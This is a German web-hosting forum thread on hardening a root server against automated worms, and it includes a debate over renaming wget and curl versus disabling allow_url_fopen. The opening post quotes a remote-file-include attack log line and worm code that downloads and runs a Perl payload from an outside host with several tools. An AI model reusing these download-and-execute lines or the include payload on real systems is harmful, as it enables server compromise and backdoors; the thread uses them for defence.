Root-Server: Sicherheit Scripte

[carsten]

Hier ein kleiner Tipp, um es webbasierten Angreifern etwas schwerer zu machen.

Dieser Tipp ersetzt nicht die normalen weitergehenden Absicherungen eines Webservers, sondern ist zusätzlich zu verstehen.

Von dem ersten Moment an, an dem der Server im Netz ist, wird er von Würmern und Bots angegriffen. Ein typischer Angriff kann so aussehen:

Code:

202.180.216.12 - - [05/Jan/2008:10:19:58 +0100] "GET /forum/smalltalk/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.freewebs.com/yuonme/indo_bot.txt?? HTTP/1.1" 301 - "-" "libwww-perl/5.805"

Hier versucht ein Wurm von der IP 202.180.216.12 eine Lücke im ZenCart auszunutzen (egal, ob es installiert ist oder nicht - es werden einfach alle Server mit vielen Lücken ausprobiert.)

Bei Erfolg wird eine Datei nachgeladen, die wiederrum versucht eine Backdoor zu installieren. Dabei versucht das angreifende Script, verschiedenen Schadcode nachzuladen:

Code:

@passthru('cd /tmp;wget http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
@passthru('cd /tmp;curl -O http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
@passthru('cd /tmp;lwp-download http://freewebs.com/yuonme/indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
@passthru('cd /tmp;lynx -source http://freewebs.com/yuonme/indo_3.txt >indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
@passthru('cd /tmp;fetch http://freewebs.com/yuonme/indo_3.txt > indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');
@passthru('cd /tmp;GET http://freewebs.com/yuonme/indo_3.txt > indo_3.txt;perl indo_3.txt;rm -f indo_3.txt*');

Wie man sehen kann versucht dieser Wurm verschiedene typische Nachlade-Programme wie wget, curl, etc. zu nutzen.


Tipp:

Wenn Ihr es nicht unbedingt anders braucht, benennt einfach diese typischen Lade-Programme um, so dass ein Wurm sie nicht mehr finden kann. Das verhindert zwar nicht einen Einbruch um jeden Preis, macht es aber automatischen Angreifern schwerer.

[shadyfan]

kannst du auch noch kurz erklären wie man die umbennt?

Vielen Dank
shadyfan

[Guin]

kannst du auch noch kurz erklären wie man die umbennt?

Linux: mv alter_name neuer_name
;)

Beispiel:
mv wget w_get

[HosterME.de]

Das ist ziemlich großer Quatsch:
1. Einige gutartige Programme, z.B. apt-get laufen dann auch nicht mehr.
2. Nach einem Update würden die executables irgendwann wieder ersetzt werden.
Würde von einer solchen Lösung daher absehen.

Bessere Empfehlung: mod_security, allow_url_fopen off, und einiges mehr - gibt genug Howtos

[[ameus] Stephan.Winter]

security by obscurity? ;-)

[XnS]

Das ist ziemlich großer Quatsch:
1. Einige gutartige Programme, z.B. apt-get laufen dann auch nicht mehr.
2. Nach einem Update würden die executables irgendwann wieder ersetzt werden.
Würde von einer solchen Lösung daher absehen.

Bessere Empfehlung: mod_security, allow_url_fopen off, und einiges mehr - gibt genug Howtos

Die meisten Web-Applikationen die über APT geladen werden koennen, landen nicht direkt im Web-Root. Daher ist es hier recht einfach, einen symbolischen Link mit anderem Namen auf die Applikation zu erstellen. Die Punkte 1 und 2 haben sich somit erledigt.

[HosterME.de]

Ich verstehe den vorherigen Punkt nicht - das hat nichts mit web-root o.ä. zu tun. apt benutzt andere Programme um Updates herunterzuladen. Wenn diese anders heißen funktioniert apt-get update/upgrade nicht mehr... Bei vielen anderen Tools ist es genauso.

[[ameus] Stephan.Winter]

Ich verstehe den vorherigen Punkt nicht - das hat nichts mit web-root o.ä. zu tun. apt benutzt andere Programme um Updates herunterzuladen. Wenn diese anders heißen funktioniert apt-get update/upgrade nicht mehr... Bei vielen anderen Tools ist es genauso.

Ich glaube das liegt ein Missverständnis vor. Carsten sprach von einem umbenennen der URLs (von extern) und nicht vom Umbenennen von Programmen auf dem System.

[pmatthaei]

Ich glaube das liegt ein Missverständnis vor. Carsten sprach von einem umbenennen der URLs (von extern) und nicht vom Umbenennen von Programmen auf dem System.

Ich glaube schon, dass er damit meinte, typische Programme zum herunterladen umzubennen (curl, lynx, wget etc.).
Mal davon abgesehen, dass dann jeder Benutzer auf dem System die neuen Programmnamen benutzen müsste wurde ja schon angesprochen, dass man dies nach jedem Upgrade des Pakets wieder erneut ausführen müsste, somit ein sc.. Aufwand.

Das Problem wird hier einfach an der falschen Stelle angepackt. Wenn ein Angreifer schon soweit kommt, dass er executen kann, dann sollte man die Webapplikation (oder auch Webserver wenn der zB schuldig ist) versuchen zu fixxen, nicht sein eigenes System kaputtmachen.
Curl und wget zum Beispiel wird bei manchen Maintainer Skripten bei Debian benutzt - die Installationen der Pakete würden zwangsläufig fehlschlagen.

Ein gutes Workaround wäre einfach wie auch schon vorgeschlagen, url_include und url_fopen zu deaktivieren. mod_security würde an der Stelle an sich zwar auch gut ansetzen (exec verbieten) - aber mod_security ist selber kaputt - daher doof.

[dnienhaus]

Wenn ein Angreifer schon soweit kommt, dass er executen kann, dann sollte man die Webapplikation (oder auch Webserver wenn der zB schuldig ist) versuchen zu fixxen, nicht sein eigenes System kaputtmachen.

Ist es dann nicht schon ein gaaanz klitzekleines bisschen zu spät? ;)